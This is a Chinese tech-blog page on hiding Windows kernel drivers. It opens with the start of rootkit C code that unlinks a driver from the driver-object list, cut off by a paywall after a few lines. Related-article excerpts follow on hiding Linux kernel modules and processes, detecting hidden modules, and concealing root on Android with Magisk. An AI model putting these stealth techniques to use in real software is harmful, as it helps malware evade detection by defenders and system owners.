隐藏内核模块的方法

最新推荐文章于 2024-10-08 17:14:01 发布
原创 最新推荐文章于 2024-10-08 17:14:01 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#string #object #null #module

本文介绍了两种隐藏驱动模块的方法,通过移除驱动对象和设备对象来实现。具体包括从驱动对象列表中删除模块,以及从设备对象列表中删除设备。代码示例展示了如何操作这些对象,涉及内存分配、字符串转换及调试打印。 
 
 

  
  在rootkit.com上一个russian hacker发的文章中提到这两种方法,和他交流了下,在llroot中实现了,代码贴出来灌水:
 
 

 
 

  
  /******************************************************************************
**
** 
The following routines implement hide driver by removing module from 
** 
driver objects and device 
objects
**
*******************************************************************************/
void 
RemoveModuleFromDriverObjects(void)
{
 POBJECT_TYPE 
DriverType=*IoDriverObjectType;
 PLIST_ENTRY 
e_prev,e_next,entry0,entry1;
 PDRIVER_OBJECT obj;
 PUNICODE_STRING 
punistrDriverName;
 PANSI_STRING pstrDriverName;
 NTSTATUS 
ntStatus;
 ULONG 
d_size;
 
 
 entry0=DriverType->ObjectListHead.Flink;
 entry1=entry0;
 punistrDriverName=(PUNICODE_STRING) 
ExAllocatePool(PagedPool, sizeof(UNICODE_STRING)+(sizeof(WCHAR)*1024));
 if 
(punistrDriverName == NULL)
 {
  Dbg
最低0.47元/天 解锁文章
易语言隐藏所有进程模块源码
06-02
"隐藏所有进程模块"是指在编程中实现一个功能,使得指定的进程或程序的所有模块(如DLL动态链接库)在系统中变得不可见,这通常涉及到系统级的操作和进程管理。 在易语言中实现这一功能,你需要了解以下几个关键...
【原创】Magisk Root隐藏模块 Shamiko安装
拉灯的小手的博客
07-13 7322
Magisk 刷入流程可参考之前文章,此文不在赘述 google nexus5x 刷机抓包逆向环境配置(一) google nexus5x 刷机抓包逆向环境配置(二) google nexus5x 刷机抓包逆向环境配置(三)1.下载Shamiko并上传至手机目录:adb push Shamiko-v0.5.1-115-release.zip /sdcard/ 2.Magisk的模块功能中使用本地安装刷入Shamiko 3.Magisk的设置中关闭遵守排除列表 4.回到模块功能此时Shamiko中显示Sh
隐藏内核模块
weixin_33744854的博客
06-12 599
四、隐藏内核模块 对于内核模块,我原以为IS会通过获取内核变量PsLoadedModuleList,然后在通过这个来遍历所有的内核模块。假设此时获得结果1。通过调用函数NtQuerySystemInformation,参数SystemModuleInformation,假设此时获得结果2。再把结果1与结果2进行比较,这样就会发现被隐藏模块。但事实证明我想的太复杂...
5从用户空间隐藏内核模块_Linux_Rootkit.md
这是一个c++热爱者的博客哟
02-03 1147
事实上,我们的 Rootkit 仍在运行,这意味着我们仍在内存中,任何形式的内存分析或具有远程能力的 DFIR 专业人员都会很快发现我们(特别是使用“rootkit”之类的名称四处走动!列表中的每一项都不知道自己在大局中的位置,只知道谁在前面,谁在后面。结构作为字段包含在另一个结构中,该结构保存我们链接在一起的对象,更容易且更易于管理。事实上,在我们的内核模块中,我们可以通过查看指向和模块的指针来找出列表中哪些模块在我们之前/之后。请注意,在上面的内核源代码片段中,结构中没有条目或类似内容。
隐藏自己的Linux内核模块
TCP/IP
05-09 6320
前面我提倡使用oneshot模式加载模块,即让模块在init函数中把事情做完后就return -1,这样系统中便不存在这么一个模块,也就不需要隐藏了。 但是,由于THIS_MODULE宏的存在,我们发现实际上隐藏一个模块是多么地简单。事实上,模块可以在init函数中通过THIS_MODULE宏实现自隐藏的。 既然如此简单,还费事搞oneshot干嘛,精神洁癖总是不想看到return -1。 和进程隐藏完全不同,进程无法自己隐藏自己,只能依靠其它模块找到相应的task_struct,然后再摘链。 THIS_M
Casper-fs:一款功能强大的自定义隐藏Linux内核模块生成器
阿道夫的博客
01-29 444
针对lsmod的casper-fs模块可见操作密码为“Shazam”;将casper-fs改为不可见的操作密码为“AbraKadabra”;将敏感文件隐藏的操作密码为“Alakazam”,改为显示的操作密码也是“Alakazam”;文件的保护和解保护操作密码为“Sesame”;
易语言隐藏进程模块源码(1).rar
08-03
在这个“易语言隐藏进程模块源码(1).rar”压缩包中,包含的是利用易语言编写的程序,用于实现进程的隐藏功能。这一技术在系统管理、安全防护以及恶意软件中都有所应用。 首先,我们要理解什么是进程隐藏。在操作...
Win64 驱动内核编程-25.X64枚举和隐藏内核模块
天使也掉毛
03-26 4840
X64枚举和隐藏内核模块     在 WIN64 上枚举内核模块的人方法:使用 ZwQuerySystemInformation 的第 11 号功能和枚举 KLDR_DATA_TABLE_ENTRY 中的 InLoadOrderLinks 双向链表;隐藏内核模块的通用方法是把指定的驱动对象从 KLDR_DATA_TABLE_ENTRY中的 InLoadOrderLinks 双向链表上摘除。 X
Windows内核驱动EPROCESS遍历进程模块
12-14
这些模块可能包含操作系统组件、应用程序依赖项或者恶意软件可能加载的隐藏模块。 遍历EPROCESS的过程大致分为以下几步: 1. **获取进程列表**:首先,你需要获取系统中的所有进程。这可以通过遍历全局的进程链表...
linux2.4内核模块隐藏,Linux环境下的高级隐藏技术
weixin_33040687的博客
04-29 721
摘要:本文深入分析了Linux环境下文件、进程及模块的高级隐藏技术,其中包括:Linux可卸载模块编程技术、修改内存映象直接对系统调用进行修改技术,通过虚拟文件系统proc隐藏特定进程的技术。隐藏技术在计算机系统安全中应用十分广泛,尤其是在网络攻击中,当攻击者成功侵入一个系统后,有效隐藏攻击者的文件、进程及其加载的模块变得尤为重要。本文将讨论Linux系统中文件、进程及模块的高级隐藏技术,这些技术...
抓住被恶意隐藏的Linux内核模块
TCP/IP
05-11 5931
前面的文章介绍了一种相对彻底的隐藏Linux内核模块方法: https://blog.youkuaiyun.com/dog250/article/details/106023941 总结下来就是: 摘除list,使得/proc/modules中不可见。 摘除kobject,使得/sys/modules/中不可见。 摘除depend on,使得依赖模块的/sys/modules/$(depended)/holder/中不可见。 摘除vmap area list/rbtree,使得/proc/vmallocinfo中不
Shamiko模块隐藏root
最新发布
Bileton的博客
10-08 7284
在安装Shamiko模块之前,需要使用面具开启Zygisk,在面具的设置里可以开启,开启后重启手机Zygisk生效。开启后的样子。
Linux 隐藏驱动模块
qq_42931917的博客
09-09 5403
如果作为恶意驱动的话,肯定是希望自己模块加载之后不会被发现,那么就需要对安装的模块进行隐藏(其实就是让你使用查找命令找不到),使用以下函数在驱动初始化入口进行摘链+kobject_del()函数删除当前模块的kobject就可以起到在/sys/module隐藏。 list_del_init(&__this_module.list); test.c #include <linux/module.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("cur
模块隐藏
diheqiu3577的博客
07-07 398
1.模块隐藏之断链   TEB它记录的相关线程的信息,每一个线程都有自己的TEB,FS:[0]即是当前线程的TEB.             MOV eax,fs:[0]    2.  PEB存放进程信息,每个进程都有自己的PEB信息,TEB偏移0x30即当前进程的PEB;             MOV eax,fs:[0x30]             mov ...
linux隐藏文件导出,看我如何通过Linux Rootkit实现文件隐藏
weixin_36296063的博客
04-28 823
预估稿费:180RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言一直以来,我希望能深入了解Linux内核内部是如何工作的。为实现这一点,有一个比较好的思路是写一个小的Rootkit PoC。大家可以在这里找到相关Rootkit代码。这是一个非常简单的Rootkit。其功能是,隐藏特定前缀的文件使其不可见。然而,假如我们知道这些文件或文件夹的位置,就仍然可以访问它们。但...
Magisk隐藏ROOT
weixin_40306397的博客
09-18 2727
由于Zygisk和Riru只能二选一,因此此时你的Riru模块都会无法使用,你可以在文本末尾找到对应的其他模块文件安装之。另外Zygisk对Riru具有换代意义,大部分Riru模块都已经或即将支持Zygisk。magisk设置中,有个“遵守排除列表”,打开它(如果Magisk版本高于24100则不必进行这一步)配置好之后,关闭“遵守排除列表”,注意我没写错,这是必要的,不要开启“遵守排除列表”当然是确认你已经在magisk中打开了zygisk,然后在“配置排除列表”中,配置你要对谁隐藏root。
Shamiko模块 - 配合Magisk+LSPosed隐藏ROOT
热门推荐
多开鸭
01-08 1万+
Shamiko模块解决了Magisk开启Zygisk和排除列表后无法使用模块的问题。需下载对应版本的Shamiko并安装到模拟器中,然后重启。使用时需关闭遵守排除列表。安装后可同时勾选app隐藏ROOT并使用LSPosed模块
刷了面具后怎么隐藏root?避免银行app和很多检测root软件打不开
wing_77的博客
07-14 1万+
什么?手机刷了面具后,银行app和很多检测root的软件都打不开了。近年来,许多用户选择为手机刷入Root权限,这一举动无疑为手机解锁了前所未有的功能和优化潜力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值